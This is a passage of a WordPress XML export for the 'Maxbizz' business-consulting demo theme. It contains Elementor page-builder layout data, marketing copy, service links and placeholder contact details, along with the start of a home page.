		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2784cf1","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"6b0b1f4","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6191f05","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"fa0c07e","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"508a439","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3808452","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2deb288","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"aed5597","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"18feed3","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"2687052","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0b9de86","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"75d682b","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"eb8a5b2","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"6315c9f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4d6ddf8","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Inter","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#4B83FC","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8083fb5","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ddfb0e2","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8ca6f1a","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"3cf7ecd","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"fc883e9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"42bd250","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"2285a93","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"90b3f9e","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"0748676","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"02b4af2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home2.png","id":1485},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"153c642","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"17a1aa0","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #4b83fc;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"66d8a4c","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"01b2f8e","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"388d72b","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"54dd58d","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"70d0b23","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"402a70c","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"df6115d","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"88e18e0","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"6f19085","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"2d46fdb","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"d5f2cb2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"6e86112","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"6c1bc64","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"b727cfc","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"49fcb72","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"52b73d5","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"4307bab","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"ec48b7f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home2.jpg","id":1510},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"10dd183","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"16cb15c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1d0a783","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#4B83FC","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"0da7c00","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"a32b8d6","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"54363ff","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"c2b8146","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1684]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Home</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/</link>
		<pubDate>Tue, 22 Sep 2020 03:28:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1023</guid>
		<description></description>
		<content:encoded><![CDATA[[rev_slider alias="slider-2" slidertitle="Slider 2"][/rev_slider]		
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>		    
	        what we offer	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them.</p>		
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
